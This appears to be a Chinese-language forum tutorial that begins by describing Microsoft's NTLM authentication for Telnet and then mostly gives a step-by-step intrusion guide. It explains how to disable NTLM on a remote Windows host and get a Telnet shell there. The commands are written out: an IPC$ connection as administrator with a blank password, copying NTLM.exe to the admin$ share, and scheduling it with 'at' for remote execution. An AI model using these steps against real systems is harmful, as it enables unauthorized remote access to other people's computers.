Telnet身份驗證也就是NTLM驗證，是微軟為了保證Telnet登錄安全的一個驗證體系。那么這個功能如何實現(xiàn)呢?這里我們就來詳細(xì)介紹一下。由于Telnet功能太強大,而且也是入侵者使用最頻繁的登錄手段之一,因此微軟公司添加了Telnet身份驗證系統(tǒng),稱為NTLM驗證,它要求Telnet終端除了需要有Telnet服務(wù)主機的用戶名和密碼外,還需要滿足NTLM驗證關(guān)系.NTLM驗證大大增強了Telnet主機的安全性,就像一只攔路虎把很多入侵者拒之門外.（關(guān)于NTLM我有寫一個專門帖子.各位可以去看看）

Telnet身份驗證1.使用Telnet連接主機

指令格式（cmd）:Telnet 192.168.0.0 連接端口號

如果要斷開.就是exit.

Telnet身份驗證2.典型Telnet入侵攻略

第一步:建立IPC$連接

第二步:開啟遠(yuǎn)程Telnet連接,首先在cmd（確定此時的根目錄是目標(biāo)的）輸入指令.service  開啟service項目.仔細(xì)找找.就有Telnet服務(wù)項.把它打開.

第三步:取消IPC$連接:net use 192.168.0.0 /del

第四步:去掉NTLM驗證,如果沒有去除目標(biāo)上的NTLM驗證,在登錄目標(biāo)的電腦的時候就會失敗.

其實方法有很多種.就介紹最常用的一個.也是最簡單的方法吧.

首先,在本地計算機上建立一個與遠(yuǎn)程主機上相同的賬號和密碼.

指令:net localgroup alpha /add不過確定對方的賬號也是alpha.因為要相同的.

第二步:通過"開始"→"程序"→"附件"找到"命令提示符",使用鼠標(biāo)右鍵單擊"命令提示符",然后選擇"屬性".

在"以其他用戶身份運行（U）"前面挑上挑.然后點."確定"接著.仍然按照上述路徑找到"命令提示符"(cmd).之后用左健打開它.

之后寫上用戶名和密碼.alpha的

然后點確定.得到cmd shell框.

之后輸入我們的指令:Telnet 192.168.0.0

現(xiàn)在就會顯示一個更新后的cmd shell.這個shell就192.168.0.0上的.

其實去掉Telnet身份驗證的方法很多.再介紹給大家一個方法.

這個方法就是超級菜鳥話.因為我們需要用到一個工具.NTLM.exe.這個工具就像是3389.exe一樣.只要把3389.exe傳到一臺機器上去執(zhí)行.那臺機器上的3389端口就會自動打開.

NTLM.exe的運作概念和3389.exe是一樣的.我們需要做的就是把我們的NTLM.exe傳到192.168.0.0這個機器上.

首先:開cmd.

然后輸入指令:net use \\192.168.0.0\ipc$*""\user:administrator

之后再輸入指令:copy c:\NTLM.exe \\192.168.0.0\admin$

解釋一下:\admin$是使用192.168.0.0主機上的admin用戶共享權(quán)限.

然后再輸入察看時間指令:net time \\192.168.0.0

我們假如對方的時間是2007/9/21 下午3點21分.

之后再輸入執(zhí)行指令:at \\192.168.0.0 15:22 NTLM.exe

解釋一下:15:22是24小時至的下午3點22分.cmd shell輸入指令時一定要寫24小時的.

之后當(dāng)按回車確定后得到:新增加一項作業(yè)　　　　
或者是什么指令成功完成的提示字后.等待１分鐘.讓cmd完成我們的shell command.

之后我們再輸入指令:Telnet 192.168.0.0

Ok.大功告成.

如果要恢復(fù)Telnet身份驗證.我們要用到一個shell工具:resumeTelnet.exe

resumeTelnet.exe使用的方法是這樣的.

命令格式:ResumeTelnet.exe \\\\server name password

其中server name是主機域名或者是IP都可以.我們就寫192.168.0.0

password當(dāng)然就是密碼了.

回車確定.當(dāng)顯示the command completed successfully后.一切完成.